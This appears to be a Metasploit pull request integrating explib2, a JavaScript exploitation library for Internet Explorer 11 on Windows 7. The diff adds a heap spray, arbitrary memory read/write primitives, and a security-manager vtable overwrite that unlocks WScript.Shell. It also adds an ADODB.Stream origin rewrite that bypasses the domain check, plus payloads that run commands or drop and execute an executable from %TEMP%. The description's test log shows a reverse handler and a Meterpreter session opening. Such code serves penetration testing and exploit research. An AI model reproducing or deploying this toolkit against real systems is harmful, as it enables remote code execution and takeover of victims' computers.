### PR TITLE
Explib2 integration into metasploit

### DIFF
--- a/data/js/memory/explib2/lib/explib2.js
+++ b/data/js/memory/explib2/lib/explib2.js
@@ -1,0 +1,422 @@
+
+
+ExpLib = (function() {
+
+	function ExpLib( num_arrays, arr_size, base, payload ) {
+		this.arr1 = null;
+		this.arr2 = null;
+		this.base = base;
+		this.arr_size = arr_size;
+		this.arr_arr = null;
+
+		this.payload = payload;
+		this.modules = {}
+		this.getproc = null;
+		this.loadlibrary = null;
+
+		// Offset to the Origin URL in the Stream, modifying it
+		// allows to bypass msado15.SecurityCheck(), allowing
+		// for example to write stream contents to filesystem.
+		this.stream_origin = 0x44;
+	}
+
+	ExpLib.prototype.resolveAPI = function( modulename, procname ) {
+		var module  = this.resolveModule( modulename );
+
+		return this.callAPI( this.getproc, module, this.allocateString(procname) );
+	}
+
+	ExpLib.prototype.resolveModule = function( modulename ) {
+		if ( this.modules[modulename] )
+			return this.modules[modulename];
+
+		var module = this.callAPI( this.loadlibrary, this.allocateString(modulename) );
+		this.modules[modulename] = module;
+		return module;
+	}
+
+
+	ExpLib.prototype.spray = function() {
+		this.arr_arr = new Array( num_arrays );
+
+		var decl = "[";
+
+		for ( var i = 0; i < this.arr_size - 1; ++ i ) {
+			decl += '0,';
+		}
+
+		decl += '0';
+		decl += ']';
+
+		for ( var i = 0; i < num_arrays; ++ i ) {
+			this.arr_arr[i] = eval(decl);
+			this.arr_arr[i][0] = 0x21212121;
+			this.arr_arr[i][1] = 0x22222222;
+			this.arr_arr[i][2] = 0x23232323;
+			this.arr_arr[i][3] = 0x24242424;
+		}
+
+  }
+
+  ExpLib.prototype.setValue = function(i1, i2, v) {
+		this.arr_arr[i1][i2] = v;
+	}
+
+
+  ExpLib.prototype.setValueByAddr = function(index, addr, v) {
+		this.arr_arr[index][((addr % 0x1000) - 0x20) / 4] = v;
+	}
+
+	ExpLib.prototype.read32 = function(addr) {
+		if ( addr % 4 ) {
+			// error
+		}
+
+		if ( addr >= this.arr2_member_base ) {
+			return this.arr2[(addr - this.arr2_member_base)/4];
+		} else {
+			return this.arr2[0x40000000 - (this.arr2_member_base - addr)/4]
+		}
+	}
+
+	ExpLib.prototype.write32 = function(addr, value) {
+		if ( addr % 4 ) {
+			// error
+		}
+
+		if ( value >= 0x80000000 )
+			value = -(0x100000000 - value);
+
+		//alert(((addr - this.arr2_member_base)/4).toString(16));
+		if ( addr >= this.arr2_member_base ) {
+			this.arr2[(addr - this.arr2_member_base)/4] = value;
+		} else {
+			this.arr2[0x40000000 - (this.arr2_member_base - addr) / 4] = value;
+		}
+	}
+
+	ExpLib.prototype.read8 = function(addr) {
+		var value = this.read32( addr  & 0xfffffffc );
+		switch ( addr % 4 ) {
+			case 0: return (value & 0xff);
+			case 1: return ((value >> 8) & 0xff);
+			case 2: return ((value >> 16) & 0xff);
+			case 3: return ((value >> 24) & 0xff);
+		}
+
+		return 0;
+	}
+
+	ExpLib.prototype.write8 = function(addr, value) {
+		var original_value = this.read32( addr  & 0xfffffffc );
+		var new_value;
+
+		switch ( addr % 4 ) {
+			case 0:
+				new_value = (original_value & 0xffffff00) | (value & 0xff);
+				break;
+
+			case 1:
+				new_value = (original_value & 0xffff00ff) | ((value & 0xff) << 8);
+				break;
+			case 2:
+				new_value = (original_value & 0xff00ffff) | ((value & 0xff) << 16);
+				break;
+			case 3:
+				new_value = (original_value & 0x00ffffff) | ((value & 0xff) << 24);
+				break;
+		}
+
+
+		this.write32( addr  & 0xfffffffc, new_value );
+	}
+
+
+	ExpLib.prototype.writeBytes = function(addr, bytes) {
+		for ( var i = 0; i + 3 < bytes.length; i += 4 ) {
+			var value = (bytes[i] & 0xff) | ((bytes[i+1] & 0xff) << 8) |
+						((bytes[i + 2] & 0xff) << 16) | ((bytes[i + 3] & 0xff) << 24);
+
+			this.write32( addr + i, value );
+		}
+
+		for ( ; i < bytes.length; ++ i ) {
+			this.write8( addr + i, bytes[i] );
+		}
+	}
+
+	ExpLib.prototype.writeString = function(addr, s) {
+		var bytes = [];
+		var i = 0;
+		for ( ; i < s.length; ++ i ) {
+			bytes[i] = s.charCodeAt(i);
+		}
+
+		bytes[i] = 0;
+
+		this.writeBytes( addr, bytes );
+	}
+
+	ExpLib.prototype.writeStringW = function(addr, s) {
+		var bytes = [];
+		var i = 0;
+		for ( ; i < s.length; ++i ) {
+			bytes[i * 2] = s.charCodeAt(i);
+			bytes[i * 2 + 1] = 0;
+		}
+
+		bytes[s.length * 2] = 0;
+		bytes[s.length * 2 + 1] = 0;
+
+		this.writeBytes( addr, bytes );
+	}
+
+	ExpLib.prototype.read16 = function(addr) {
+		if ( addr % 2 ) {
+					// error, not aligned
+		}
+
+		var value = this.read32( addr  & 0xfffffffc );
+		switch ( addr % 4 ) {
+			case 0: return (value & 0xffff);
+			case 1: return ((value >> 8) & 0xffff);
+			case 2: return ((value >> 16) & 0xffff);
+			case 3: /*not supported*/ break;
+		}
+
+		return 0;
+	}
+
+	ExpLib.prototype.strequal = function(addr, s)  {
+		for ( var i = 0; i < s.length; ++ i ) {
+			if ( this.read8(addr + i) != s.charCodeAt(i) )
+				return false;
+		}
+
+		return true;
+	}
+
+
+	ExpLib.prototype.getModuleBase = function(addr) {
+
+		var cur_addr = addr;
+
+		while ( cur_addr > 0 ) {
+
+			if ( (this.read32(cur_addr) & 0xffff) == 0x5a4d ) {
+				return cur_addr;
+			}
+
+			cur_addr -= 0x10000;
+		}
+
+		return 0;
+	}
+
+
+
+	ExpLib.prototype.getModuleBaseFromIAT = function(base, name) {
+		var import_table = base + this.read32( base + this.read32(base + 0x3c) + 0x80 );
+		var cur_table = import_table;
+
+		while ( cur_table < import_table + 0x1000 ) {
+
+			var name_addr = base + this.read32(cur_table + 12);
+			if ( this.strequal( name_addr, name ) ) {
+				var iat = base + this.read32(cur_table + 16);
+				var func = this.read32(iat);
+				while ( 0 == func ) {
+					iat += 4;
+					func = this.read32(iat);
+				}
+
+				return this.getModuleBase( func & 0xFFFF0000 );
+
+			}
+
+			cur_table += 20;
+		}
+
+		return 0;
+	}
+
+	ExpLib.prototype.getProcAddress = function(base, procname)  {
+		var export_table = base + this.read32( base + this.read32(base + 0x3c) + 0x78 );
+		var num_functions = this.read32( export_table + 20 );
+		var addr_functions = base + this.read32( export_table + 28 );
+		var addr_names = base + this.read32( export_table + 32 );
+		var addr_ordinals = base + this.read32( export_table + 36 );
+
+		for ( var i = 0; i < num_functions; ++ i ) {
+			var name_addr = this.read32( addr_names + i * 4 ) + base;
+			if ( this.strequal( name_addr, procname ) ) {
+				var ordinal = this.read16( addr_ordinals + i * 2 );
+				var result = this.read32( addr_functions + ordinal * 4 ) + base;
+				return result;
+			}
+		}
+
+		return 0;
+	}
+
+	ExpLib.prototype.searchBytes = function(pattern, start, end)  {
+
+		if ( start >= end || start + pattern.length > end )
+			return 0;
+
+		var pos = start;
+		while ( pos < end ) {
+			for ( var i = 0; i < pattern.length; ++ i ) {
+				if ( this.read8(pos + i) != pattern[i] )
+					break;
+			}
+
+			if ( i == pattern.length ) {
+				return pos;
+			}
+
+			++ pos;
+		}
+
+		return 0;
+	}
+
+
+	ExpLib.prototype.getError = function(msg) {
+		return this.err_msg;
+	}
+
+	ExpLib.prototype.setError = function(msg) {
+		this.err_msg = msg;
+	}
+
+	ExpLib.prototype.setStreamOrigin = function(offset) {
+		this.stream_origin = offset;
+	}
+
+	ExpLib.prototype.getStreamOrigin = function() {
+		return this.stream_origin;
+	}
+
+	ExpLib.prototype.memcpy = function(dst, src, size) {
+		var i = 0;
+		for ( ; i < size - 4; i += 4 ) {
+			this.write32( dst + i, this.read32(src + i) );
+		}
+
+		for ( ; i < size; ++ i ) {
+			this.write8( dst + i, this.read8(src + i) );
+		}
+	}
+
+	ExpLib.prototype.go = function() {
+
+		var i = 0;
+
+
+
+		for ( ; i < this.arr_arr.length - 1; ++ i ) {
+			this.arr_arr[i][this.arr_size + 0x1c / 4] = 0;
+
+			if ( this.arr_arr[i][this.arr_size + 0x18 / 4] == this.arr_size ) {
+				this.arr_arr[i][this.arr_size + 0x14 / 4] = 0x3fffffff;
+				this.arr_arr[i][this.arr_size + 0x18 / 4] = 0x3fffffff;
+
+				this.arr_arr[i + 1].length = 0x3fffffff;
+
+				if ( this.arr_arr[i+1].length == 0x3fffffff ) {
+					break;
+				}
+			}
+
+		}
+
+		if ( i >= this.arr_arr.length - 1 ) {
+			this.setError( "Cannot find array with corrupt length!" );
+			return false;
+		}
+
+		this.arr1_idx = i;
+		this.arr2_idx = i + 1;
+
+		this.arr1 = this.arr_arr[i];
+		this.arr2 = this.arr_arr[i + 1];
+
+		this.arr2_base = this.base + 0x1000;
+		this.arr2_member_base = this.arr2_base + 0x20;
+
+
+		var target_arr = new Array( 1, 2, 3, 4, 5 );
+		var target_arr_addr =  this.leakAddress(target_arr);
+		var target_arr_vftable = this.read32(target_arr_addr);
+
+		var func_addr = this.leakAddress(ActiveXObject);
+		var script_engine_addr = this.read32(this.read32(func_addr + 0x1c) + 4);
+
+		//alert(script_engine_addr.toString(16));
+
+		var original_securitymanager = this.read32( script_engine_addr + 0x21c );
+		if ( !original_securitymanager ) {
+			// let security manager to be valid
+			try {
+				var WshShell = new ActiveXObject("WScript.shell");
+			} catch (e) {}
+
+			original_securitymanager = this.read32( script_engine_addr + 0x21c );
+		}
+
+		var original_securitymanager_vtable = this.read32(original_securitymanager);
+		var securitymanager_size = 0x28;
+		var fake_securitymanager = 0x1a1b2010;
+		var fake_securitymanager_vtable = fake_securitymanager + 0x28;
+		//alert(original_securitymanager.toString(16));
+
+		this.memcpy( fake_securitymanager, original_securitymanager, securitymanager_size );
+		this.memcpy( fake_securitymanager_vtable, original_securitymanager_vtable, 0x70 );
+		this.write32( fake_securitymanager, fake_securitymanager_vtable );
+		this.write32(script_engine_addr + 0x21c, fake_securitymanager);
+
+		var jscript9_base = this.getModuleBase( this.read32(script_engine_addr) & 0xffff0000 );
+		var jscript9_code_start = jscript9_base + this.read32(jscript9_base + this.read32(jscript9_base + 0x3c) + 0x104);
+		var jscript9_code_end = jscript9_base + this.read32(jscript9_base + this.read32(jscript9_base + 0x3c) + 0x108);
+
+
+		this.write32( fake_securitymanager_vtable + 0x14,
+					 this.searchBytes( [0x8b, 0xe5, 0x5d, 0xc2, 0x08], jscript9_code_start, jscript9_code_end ) ); /* mov esp, ebp; pop ebp; ret 8; */
+
+		this.write32( fake_securitymanager_vtable + 0x10,
+					 this.searchBytes( [0x8b, 0xe5, 0x5d, 0xc2, 0x04], jscript9_code_start, jscript9_code_end ) ); /* mov esp, ebp; pop ebp; ret 4; */
+
+		this.payload.execute(this);
+
+
+		/*
+		* restore
+		*/
+
+		this.write32( script_engine_addr + 0x21c, original_securitymanager );
+
+		return true;
+
+	}
+
+	ExpLib.prototype.leakAddress = function(obj) {
+		this.arr_arr[this.arr2_idx + 1][2] = obj;
+		return this.read32(this.arr2_member_base + 0x1008);
+	}
+
+	ExpLib.prototype.switchStreamOrigin = function(stream) {
+		var obj = this.leakAddress(stream);
+		var stream_obj = this.read32(obj + 0x30);
+		//var url_addr = this.read32(stream_obj + 0x3c);
+		var url_addr = this.read32(stream_obj + this.stream_origin);
+
+		/*
+		* bypass domain check
+		*/
+		this.writeStringW( url_addr, 'file:///C:/1.htm' );
+	}
+
+	return ExpLib;
+
+})();

--- a/data/js/memory/explib2/lib/explib2.js
+++ b/data/js/memory/explib2/lib/explib2.js
@@ -8,6 +8,10 @@ ExpLib = (function() {
 		this.base = base;
 		this.arr_size = arr_size;
 		this.arr_arr = null;
+		// Allows to control the contents of the sprayed memory.
+		// Have into account some array positions will be corrupted
+		// while leaking and modifying things.
+		this.arr_contents = [];
 
 		this.payload = payload;
 		this.modules = {}
@@ -35,7 +39,6 @@ ExpLib = (function() {
 		return module;
 	}
 
-
 	ExpLib.prototype.spray = function() {
 		this.arr_arr = new Array( num_arrays );
 
@@ -50,13 +53,19 @@ ExpLib = (function() {
 
 		for ( var i = 0; i < num_arrays; ++ i ) {
 			this.arr_arr[i] = eval(decl);
-			this.arr_arr[i][0] = 0x21212121;
-			this.arr_arr[i][1] = 0x22222222;
-			this.arr_arr[i][2] = 0x23232323;
-			this.arr_arr[i][3] = 0x24242424;
+			for(var j = 0; j < this.arr_contents.length; j++) {
+				this.arr_arr[i][j] = this.arr_contents[j];
+			}
 		}
 
   }
+
+	// Should be used before calling spray()
+	ExpLib.prototype.setArrContents = function(contents) {
+		for(var i = 0; i < this.arr_size && i < contents.length; i++) {
+			this.arr_contents[i] = contents[i];
+		}
+	}
 
   ExpLib.prototype.setValue = function(i1, i2, v) {
 		this.arr_arr[i1][i2] = v;

--- a/data/js/memory/explib2/payload/drop_exec.js
+++ b/data/js/memory/explib2/payload/drop_exec.js
@@ -1,0 +1,33 @@
+function payload_drop_exec(pe) {
+
+	this.execute = function(explib) {
+
+		var WshShell = new ActiveXObject("WScript.shell");
+		var temp = WshShell.ExpandEnvironmentStrings("%TEMP%");
+		var filename = temp + "\\a.exe";
+
+		var bStream = new ActiveXObject("ADODB.Stream");
+		var txtStream = new ActiveXObject("ADODB.Stream");
+		bStream.Type = 1;
+		txtStream.Type = 2;
+
+		bStream.Open();
+		txtStream.Open();
+
+		explib.switchStreamOrigin(txtStream);
+
+		txtStream.WriteText(pe);
+		txtStream.Position = 2;
+		txtStream.CopyTo( bStream );
+		txtStream.Close();
+
+		explib.switchStreamOrigin(bStream);
+
+		bStream.SaveToFile(filename, 2);
+		bStream.Close();
+
+		oExec = WshShell.Exec(filename);
+	}
+
+	return this;
+}

--- a/data/js/memory/explib2/payload/exec.js
+++ b/data/js/memory/explib2/payload/exec.js
@@ -1,0 +1,10 @@
+function payload_exec(cmd) {
+
+	this.execute = function(explib) {
+
+		var WshShell = new ActiveXObject("WScript.shell");
+		var oExec = WshShell.Exec(cmd);
+	}
+
+	return this;
+}

--- a/lib/msf/core/exploit/http/server.rb
+++ b/lib/msf/core/exploit/http/server.rb
@@ -826,6 +826,14 @@ protected
     @cache_heap_spray ||= Rex::Exploitation::Js::Memory.heap_spray
   end
 
+  def js_explib2
+    @explib2 ||= ::Rex::Exploitation::Js::Memory.explib2
+  end
+
+  def js_explib2_payload(payload="exec")
+    @explib2_payload ||= ::Rex::Exploitation::Js::Memory.explib2_payload(payload)
+  end
+
   def js_os_detect
     @cache_os_detect ||= ::Rex::Exploitation::Js::Detect.os
   end

--- a/lib/rex/exploitation/js/memory.rb
+++ b/lib/rex/exploitation/js/memory.rb
@@ -58,6 +58,23 @@ class Memory
       }).obfuscate
   end
 
+  def self.explib2
+    js = ::File.read(::File.join(Msf::Config.data_directory, "js", "memory", "explib2", "lib", "explib2.js"))
+
+    js
+  end
+
+  def self.explib2_payload(payload="exec")
+    case payload
+    when "drop_exec"
+      js = ::File.read(::File.join(Msf::Config.data_directory, "js", "memory", "explib2", "payload", "drop_exec.js"))
+    else # "exec"
+      js = ::File.read(::File.join(Msf::Config.data_directory, "js", "memory", "explib2", "payload", "exec.js"))
+    end
+
+    js
+  end
+
 end
 end
 end

--- a/lib/rex/exploitation/js/memory.rb
+++ b/lib/rex/exploitation/js/memory.rb
@@ -61,7 +61,7 @@ class Memory
   def self.explib2
     js = ::File.read(::File.join(Msf::Config.data_directory, "js", "memory", "explib2", "lib", "explib2.js"))
 
-    js
+    ::Rex::Exploitation::ObfuscateJS.obfuscate(js)
   end
 
   def self.explib2_payload(payload="exec")
@@ -72,7 +72,7 @@ class Memory
       js = ::File.read(::File.join(Msf::Config.data_directory, "js", "memory", "explib2", "payload", "exec.js"))
     end
 
-    js
+    ::Rex::Exploitation::ObfuscateJS.obfuscate(js)
   end
 
 end

--- a/lib/rex/text.rb
+++ b/lib/rex/text.rb
@@ -429,7 +429,7 @@ module Text
   #
   # Returns a unicode escaped string for Javascript
   #
-  def self.to_unescape(data, endian=ENDIAN_LITTLE)
+  def self.to_unescape(data, endian=ENDIAN_LITTLE, prefix='%%u')
     data << "\x41" if (data.length % 2 != 0)
     dptr = 0
     buff = ''
@@ -440,9 +440,9 @@ module Text
       dptr += 1
 
       if (endian == ENDIAN_LITTLE)
-        buff << sprintf('%%u%.2x%.2x', c2, c1)
+        buff << sprintf("#{prefix}%.2x%.2x", c2, c1)
       else
-        buff << sprintf('%%u%.2x%.2x', c1, c2)
+        buff << sprintf("#{prefix}%.2x%.2x", c1, c2)
       end
     end
     return buff

--- a/test/modules/exploits/test/explib2_ie11_drop_exec_test_case.rb
+++ b/test/modules/exploits/test/explib2_ie11_drop_exec_test_case.rb
@@ -63,7 +63,7 @@ var pe_exe = "<%= exe_js %>"
 var num_arrays = 98688;
 var arr_size = (0x1000 - 0x20)/4;
 var explib = new ExpLib( num_arrays, arr_size, 0x1a1b3000, new payload_drop_exec(pe_exe) );
-
+explib.setArrContents([0x21212121, 0x22222222, 0x23232323, 0x24242424]);
 explib.spray();
 
 /*

--- a/test/modules/exploits/test/explib2_ie11_drop_exec_test_case.rb
+++ b/test/modules/exploits/test/explib2_ie11_drop_exec_test_case.rb
@@ -1,0 +1,89 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::BrowserExploitServer
+  include Msf::Exploit::EXE
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Explib2 Drop Exec Test Case",
+      'Description'    => %q{
+        This module allows to test integration of Explib2 into metasploit.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'guhe120', # Original explib2 author
+          'juan vazquez'
+        ],
+      'References'     =>
+        [
+          [ 'URL', 'https://github.com/jvazquez-r7/explib2' ],
+        ],
+      'Platform'       => 'win',
+      'BrowserRequirements' =>
+        {
+          :source  => /script/i,
+          :os_name => OperatingSystems::WINDOWS,
+          :ua_name => HttpClients::IE,
+          :ua_ver  => '11.0'
+        },
+      'Targets'        =>
+        [
+          [ 'Automatic', { } ]
+        ],
+      'DisclosureDate' => "Mar 28 2014",
+      'DefaultTarget'  => 0))
+  end
+
+  def exploit_html
+
+    exe_js = Rex::Text.to_unescape(generate_payload_exe, ENDIAN_LITTLE, "\\u")
+
+    template = %Q|<html>
+<head>
+  <script>
+    <%= js_explib2_payload("drop_exec") %>
+  </script>
+  <script>
+    <%= js_explib2 %>
+  </script>
+</head>
+<body>
+<script>
+var pe_exe = "<%= exe_js %>"
+
+var num_arrays = 98688;
+var arr_size = (0x1000 - 0x20)/4;
+var explib = new ExpLib( num_arrays, arr_size, 0x1a1b3000, new payload_drop_exec(pe_exe) );
+
+explib.spray();
+
+/*
+* Modify array length
+* In the real world exp, you  need to modify the array length field with your vulnerability
+*/
+alert( 'Execute the command in windbg: "ed 1a1b3000+18 400"' );
+
+explib.go();
+
+</script>
+</body>
+</html>
+    |
+
+    return template, binding()
+  end
+
+  def on_request_exploit(cli, request, target_info)
+    send_exploit_html(cli, exploit_html)
+  end
+
+end

--- a/test/modules/exploits/test/explib2_ie11_drop_exec_test_case.rb
+++ b/test/modules/exploits/test/explib2_ie11_drop_exec_test_case.rb
@@ -25,7 +25,7 @@ class Metasploit3 < Msf::Exploit::Remote
         ],
       'References'     =>
         [
-          [ 'URL', 'https://github.com/jvazquez-r7/explib2' ],
+          [ 'URL', 'https://github.com/jvazquez-r7/explib2' ] # The original repo has been deleted
         ],
       'Platform'       => 'win',
       'BrowserRequirements' =>

--- a/test/modules/exploits/test/explib2_ie11_exec_test_case.rb
+++ b/test/modules/exploits/test/explib2_ie11_exec_test_case.rb
@@ -24,7 +24,7 @@ class Metasploit3 < Msf::Exploit::Remote
         ],
       'References'     =>
         [
-          [ 'URL', 'https://github.com/jvazquez-r7/explib2' ],
+          [ 'URL', 'https://github.com/jvazquez-r7/explib2' ] # The original repo has been deleted
         ],
       'Platform'       => 'win',
       'BrowserRequirements' =>

--- a/test/modules/exploits/test/explib2_ie11_exec_test_case.rb
+++ b/test/modules/exploits/test/explib2_ie11_exec_test_case.rb
@@ -1,0 +1,84 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::BrowserExploitServer
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Explib2 Exec Test Case",
+      'Description'    => %q{
+        This module allows to test integration of Explib2 into metasploit.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'guhe120', # Original explib2 author
+          'juan vazquez'
+        ],
+      'References'     =>
+        [
+          [ 'URL', 'https://github.com/jvazquez-r7/explib2' ],
+        ],
+      'Platform'       => 'win',
+      'BrowserRequirements' =>
+        {
+          :source  => /script/i,
+          :os_name => OperatingSystems::WINDOWS,
+          :ua_name => HttpClients::IE,
+          :ua_ver  => '11.0'
+        },
+      'Targets'        =>
+        [
+          [ 'Automatic', { } ]
+        ],
+      'DisclosureDate' => "Mar 28 2014",
+      'DefaultTarget'  => 0))
+  end
+
+  def exploit_html
+    template = %Q|<html>
+<head>
+  <script>
+    <%=js_explib2_payload%>
+  </script>
+  <script>
+    <%=js_explib2%>
+  </script>
+</head>
+<body>
+<script>
+
+var num_arrays = 98688;
+var arr_size = (0x1000 - 0x20)/4;
+var explib = new ExpLib( num_arrays, arr_size, 0x1a1b3000, new payload_exec('calc.exe') );
+
+explib.spray();
+
+/*
+* Modify array length
+* In the real world exp, you  need to modify the array length field with your vulnerability
+*/
+alert( 'Execute the command in windbg: "ed 1a1b3000+18 400"' );
+
+explib.go();
+
+</script>
+</body>
+</html>
+    |
+
+    return template, binding()
+  end
+
+  def on_request_exploit(cli, request, target_info)
+    send_exploit_html(cli, exploit_html)
+  end
+
+end

--- a/test/modules/exploits/test/explib2_ie11_exec_test_case.rb
+++ b/test/modules/exploits/test/explib2_ie11_exec_test_case.rb
@@ -58,7 +58,7 @@ class Metasploit3 < Msf::Exploit::Remote
 var num_arrays = 98688;
 var arr_size = (0x1000 - 0x20)/4;
 var explib = new ExpLib( num_arrays, arr_size, 0x1a1b3000, new payload_exec('calc.exe') );
-
+explib.setArrContents([0x21212121, 0x22222222, 0x23232323, 0x24242424]);
 explib.spray();
 
 /*


### PR DESCRIPTION
This pull requests integrates explib2 by @guhe120 into metasploit. The explib2 has been modified a little bit to make it work smoothly on IE 11. It has been tested on:
- Windows 7 SP1 
- IE11, mshtml version:

```
0:002> lmv m mshtml
start    end        module name
65bc0000 66c22000   MSHTML     (deferred)             
    Image path: C:\Windows\system32\MSHTML.dll
    Image name: MSHTML.dll
    Timestamp:        Mon Oct 14 09:15:37 2013 (525B9A19)
    CheckSum:         010660B2
    ImageSize:        01062000
    File version:     11.0.9600.16428
    Product version:  11.0.9600.16428
    File flags:       0 (Mask 3F)
    File OS:          40004 NT Win32
    File type:        2.0 Dll
    File date:        00000000.00000000
    Translations:     0409.04b0
    CompanyName:      Microsoft Corporation
    ProductName:      Internet Explorer
    InternalName:     MSHTML
    OriginalFilename: MSHTML.DLL
    ProductVersion:   11.00.9600.16428
    FileVersion:      11.00.9600.16428 (winblue_gdr.131013-1700)
    FileDescription:  Microsoft (R) HTML Viewer
    LegalCopyright:   © Microsoft Corporation. All rights reserved.
```

In other windows / IE versions probably `stream_origin` at Explib2 should be fixed. I've added methods to get and set it.
## Verification
- [x] Install Windows 7 SP1 and IE 11 (better if mshtml matches the version above).
- [x] Use the test modules to make it work with the currently available payloads. Specially interesting is the explib2_ie11_drop_exec_test_case test case, because it will allow to run arbitrary msf payload.
- [x] Use the module and exploit with it

```
> use exploit/windows/browser/explib2_ie11_drop_exec_test_case
msf exploit(explib2_ie11_drop_exec_test_case) > exploit
[*] Exploit running as background job.


[*] Started reverse handler on 0.0.0.0:4444 
[*] Using URL: http://0.0.0.0:8080/tGd8X1dZBBosQ92
[*]  Local IP: http://10.6.0.136:8080/tGd8X1dZBBosQ92
[*] Server started.
```
- [x] Go tot he browser and point to the server URL `http://10.6.0.136:8080/tGd8X1dZBBosQ92`. Once the alert popups, attach windbg and follow the instructions: `ed 1a1b3000+18 400; g` to simulate the memory corruption, continue clicking in the alert popup.
- [x] You should get a session in the console:

```
msf exploit(explib2_ie11_drop_exec_test_case) > [*] 10.6.0.136       explib2_ie11_drop_exec_test_case - Gathering target information.
[*] 10.6.0.136       explib2_ie11_drop_exec_test_case - Sending response HTML.
[*] Sending stage (769536 bytes) to 10.6.0.136
[*] Meterpreter session 1 opened (10.6.0.136:4444 -> 10.6.0.136:50719) at 2014-03-28 11:06:41 -0500

msf exploit(explib2_ie11_drop_exec_test_case) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: WIN-RNJ7NBRK9L7\Juan Vazquez
meterpreter > sysinfo
Computer        : WIN-RNJ7NBRK9L7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.172.133 - Meterpreter session 1 closed.  Reason: User exit
```
